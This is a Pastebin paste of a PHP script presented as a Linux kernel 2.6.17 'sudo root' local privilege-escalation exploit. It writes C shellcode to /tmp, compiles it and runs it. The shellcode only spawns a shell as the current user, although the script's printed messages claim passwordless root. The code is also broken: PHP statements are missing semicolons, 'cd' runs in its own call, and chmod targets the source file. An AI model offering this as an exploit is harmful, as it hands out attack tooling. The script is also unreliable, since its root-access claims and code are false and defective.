Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /******************************
- ![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
- Script Name : *nix Kernel <=2.6.17 Sudo Root Exploit
- Author : Affix
- Website : http://iHack.co.uk
- Description :
- Once this script has been run via
- Command line type `sudo su` and
- you will log in as root without the
- root password
- [PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
- ******************************/
- $cCode = "#include <stdio.h>
- char shellcode[] =
- \"\x31\xc0\" /* xor %eax, %eax */
- \"\x50\" /* push %eax */
- \"\x68\x2f\x2f\x73\x68\" /* push $0x68732f2f */
- \"\x68\x2f\x62\x69\x6e\" /* push $0x6e69622f */
- \"\x89\xe3\" /* mov %esp,%ebx */
- \"\x50\" /* push %eax */
- \"\x53\" /* push %ebx */
- \"\x89\xe1\" /* mov %esp,%ecx */
- \"\x31\xd2\" /* xor %edx,%edx */
- \"\xb0\x0b\" /* mov $0xb,%al */
- \"\xcd\x80\"; /* int $0x80 */
- int main()
- {
- void (*fp) (void);
- fp = (void *)shellcode;
- fp();
- }";
- print "$ 0day Kernel 2.6.17 Local Root by krupt\n"
- print "$ PoC krupt <iamkrupt@gmail.com>\n"
- print "$ Exploit : Affix <affix@iHack.co.uk\n";
- print "$...\n";
- print "$ Please wait Exploit is being Executed...";
- $fh = fopen("/tmp/sploit.c", 'w') or die("can't open file");
- fwrite($fh, $cCode);
- fclose($fh);
- system("cd /tmp");
- system("cc -o sploit sploit.c");
- system("chmod 777 sploit.c");
- print "$ You may now login as root with no password."
- print "$ Execute 'sudo su' command "
- print "$ Root Shell spawning "
- system("./sploit");
- //![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement